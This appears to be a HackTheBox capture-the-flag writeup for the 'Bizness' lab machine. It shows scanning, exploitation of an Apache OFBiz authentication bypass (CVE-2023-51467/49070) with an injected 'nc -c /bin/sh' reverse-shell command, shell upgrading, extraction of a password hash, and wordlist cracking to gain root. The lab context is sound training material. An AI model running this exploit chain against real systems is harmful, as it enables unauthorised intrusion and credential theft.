Post

HackTheBox Bizness Writeup

Posted
By x3ric
1 min read

Explore the fundamentals of cybersecurity in the Bizness Capture The Flag (CTF) challenge, a easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

1

10.10.11.252 bizness.htb

Script to add hosts automatically

1
2
3

ip="10.10.11.252"
domain="bizness.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

1

nmap -sCV bizness.htb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

Nmap scan report for bizness.htb (10.10.11.252)
Host is up (0.051s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
|   256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_  256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp  open  http     nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to https://bizness.htb/
443/tcp open  ssl/http nginx 1.18.0
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK
| Not valid before: 2023-12-14T20:03:40
|_Not valid after:  2328-11-10T20:03:40
|_ssl-date: TLS randomness does not represent time
|_http-server-header: nginx/1.18.0
| tls-nextprotoneg: 
|_  http/1.1
|_http-title: 400 The plain HTTP request was sent to HTTPS port
| tls-alpn: 
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1

dirb 'https://bizness.htb/'

https://bizness.htb/accounting/control/main

Powered by Apache OFBiz. Release 18

CVE-2023-51467 and CVE-2023-49070

1

nc -lvnp 9001

1
2
3
4

git clone https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass
cd Apache-OFBiz-Authentication-Bypass
vpnip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
python exploit.py --url 'https://bizness.htb' --cmd "nc -c /bin/sh $vpnip 9001"

Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:

1

python3 -c 'import pty;pty.spawn("/bin/bash")'

Press Ctrl+Z to background the shell, then run:

1

stty size; stty raw -echo; fg

As the last step, set the terminal environment:

1

export TERM=xterm;

1

cat /home/ofbiz/user.txt

1

grep --binary-files=text -rni 'currentpassword' /opt/ofbiz/runtime

1
2
3

git clone https://github.com/duck-sec/Apache-OFBiz-SHA1-Cracker
cd Apache-OFBiz-SHA1-Cracker
python OFBiz-crack.py --hash-string '$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I' --wordlist '/usr/share/dict/rockyou.txt'

This yields monkeybizness

1
2

su
cat /root/root.txt
ctf
htb cft writeup linux cve-2023-51467 cve-2023-49070
This post is licensed under CC BY 4.0 by the author.